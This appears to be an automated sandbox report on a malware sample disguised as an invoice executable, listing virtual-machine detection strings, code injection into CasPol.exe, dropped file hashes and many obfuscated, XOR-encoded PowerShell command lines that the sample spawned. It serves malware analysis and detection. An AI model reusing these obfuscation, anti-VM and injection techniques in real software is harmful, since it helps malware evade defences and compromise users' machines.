Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004345000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6486948852.0000000004382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: INVOICE-98656789.exe, 00000000.00000002.3245584457.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488399305.0000000005E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exexeQ&f

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70351B28

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 990000			Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 617008			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_00403395

ID:	1335267
Product:	CloudBasic
Start time:	09:03:25
Start date:	01.11.2023
Sample:	INVOICE-98656789.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	9cecc409f4f9637375b042b196012854
SHA1:	f6c07a9f0d98e34247d91de3c1a5a996e8d98791
SHA256:	bfb89b8cfb7e0bef091052feef1b6334007932f8db57417445d0476ac22eb1f1
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\nsyC567.tmp\AdvSplash.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4C358D33F45B713DC8206BEDD502AC3F	22870E6D18CBCEF3C42C8846582AB3AFFD0BA2A3	8B5568726474BF1C1D85A26EBE4407BFDEC3831AB6969490829DB24DC7E23802
C:\Users\user\AppData\Local\Temp\nsyC567.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	DD87A973E01C5D9F8E0FCC81A0AF7C7A	C9206CED48D1E5BC648B1D0F54CCCC18BF643A14	7FB0F8D452FEFAAC789986B933DF050F3D3E4FEB8A8D9944ADA995F572DCDCA1
C:\Users\user\AppData\Local\Temp\nsyC567.tmp\UserInfo.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	53336EC9297FC9A7780883862352AD36	3CF6E30B81E423D29E8ADD8150B328CA3843CA2D	3440D42FD3D7B50C3DD46A8FA9B0F65678D60E3E1AAB41AC23748AF30685BBB9
C:\Users\user\AppData\Local\Temp\nsyC567.tmp\nsExec.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	6C881F00BA860B17821D8813AA34DBC6	0E5A1E09B1CE1BC758D6977B913A8D9CCBE52A13	BCB93204BD1854D0C34FA30883BAB51F6813AB32ABF7FB7D4AEED21D71F6AF87
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\diskutnjr.txt	ASCII text, with very long lines (392), with CRLF line terminators	0EB14594BB6A7D6F05C9876BFAAFAED1	0D525A0EA317BE49F39620E2DEA18B6DBE973345	30FE67E7AC5F36857E733095A0A0A82803B76C000582FBE4BC91D939BB4BD5CB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\ornithodelphic.sto	data	9238706048E3DF9752022232FD213581	2FBDB8A2AEECAA4468CB94D65998916E9ECDFC48	2298FC83691AB148B9E74A8DF25B2A1F3EBF55E9E31DA895FC17DAF899888E6F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Courtman.fro	data	4ECC49EF3EA0D5EE7512D98B87AF7094	DDD1C10DAEB0EA2707278E99165AF65428FEE14D	B5E70060276D34427ACC743FB573F14D61ABAC2E6030EAAEC16169B611585F13
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne\Cognacsglassenes\beskatningsgrundlaget.fav	data	E021F22D3FC0795E600233F1E65ADF47	06FA9675ED58399B28EF5F4D17CC90A669159BBC	7277341452D9D21A7D7346C6CE384DC4F290C7B66812C28B61BB5A513B707C4F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Electrooculograms.Ske	data	57B4D111743AC7B94C23E28CBBF76B8B	DB1A08C9EEFCF68258BC38F6D609954E1961D312	738A0315332B5925343B4045689A9A1292F48D4AE79B5E1F9539A75CAD9D7058
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Eksekverbare23.bad	data	FE9E177ACFFF6E5B1E9DA112D04086E0	214E57E17CEE1DF2AD799534F316570BCA13588A	680FAA40D4DC0E1281EA423066AAAF89DC2C08BA123A6B671C6026FF0F12ECB9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Kemikaliedepotet.not	data	917C3A8C5F435543E940774C5AC0582D	569E4DBAD6DB832A0A5D9BD8CB8FB123194206C5	58346B18800F12481424C1155BB56D2338EB607FCD8C55487BC3CE9857408D05
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Odinic.dri	data	9F7E6AA4E4FFDE9165950D5C0F31DBBB	F9A60F5CAACC56B201C0AB08B191AB4F1EC72A14	08E8B0614099DE6D075CB56A1C71901F1C5B613279549B996E5CC71D7758A1B1
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Remarkedly.ver	data	900E99B27226810C1A5B9A1448697DD1	9A1A3F47446544DF0B61256532AB0986D26E9578	5C655411A932639AE7023D40E32D39A4580BC7F06EF44ED7F6D4A2516819BE7A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Miscaller\skufledes.alp	data	E09E022B12C2FBFC65EEFD72F9086348	05447291FC12421C83234CF28EFA6FB306394C8C	CA15623DAE513A49E8D16B2F2B3688AEDAB40C17B37F9A3C19FA4C84B9C66985
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\supersensually.kal	data	26DEF0721722D797D07E8E71913F5AB7	BAAD8275C9F11F69A596E84FC73AA31DA3FA3487	66CCB241D62F96EE3CF6253EF6E8AAC7ABF3D24F18600CFBDF339797EB2DED2A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\tibetansk.bud	data	6F2394C76D486EA293DC12E84BED70DA	AF0E1603D94FBDC7921978F0C3CB2DB2DCFE5711	26E4DDD89863751450685445341B37EBBAA49C0821EEF707E587B6DB0D4D219A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\zonulae.stu	data	A4CA153927455390198C6A1E6192CD68	1950A8BA960FAC870FF48E5B8C6B67E212F190B5	ED0F31AE08EB0ADE16D3F3BC873910E2300873056DDBDD3408C569EF6E8C6E36
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback\Kunstgreb\Vesturing.Ove	ASCII text, with very long lines (65536), with no line terminators	7CA9EC388413AE093369680C0FC9FF45	6EE905F35E79047E42FBF154876FA56903C35F8D	A22B16AD6A2B13F09188441E86109DB386B1E302088BCD98C94AA119942D2C12
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aceituna.fin	data	E777CCA355AF83E4013B860298DF95BD	686EFBF6A55999F3D321CB6E16BD261BE4CA1B65	61CADB5396E6AB20AEE46BCFBE378867F768C9BA369648F2E8495F12A09D47A4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aguinaldo.kon	data	DF9858E14D550ED68D223C003B7F27DE	9C8B2C903FAB2B315941E8A9182B8968D957A2A9	C629D8BFE33E053F28D445A965CEC08A992B16872FD2E60FD396160BD7D9A7DD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\anagogy.hft	data	DADBB184C1C7317EC6BE45DE2346206D	3BA22BC3833EDB0D5E2877F8F22DF70DF7B4253D	6040CC4A19897E19878CEAF71E110A5355097714F972A2FB92A8E1DBAEF7E51E
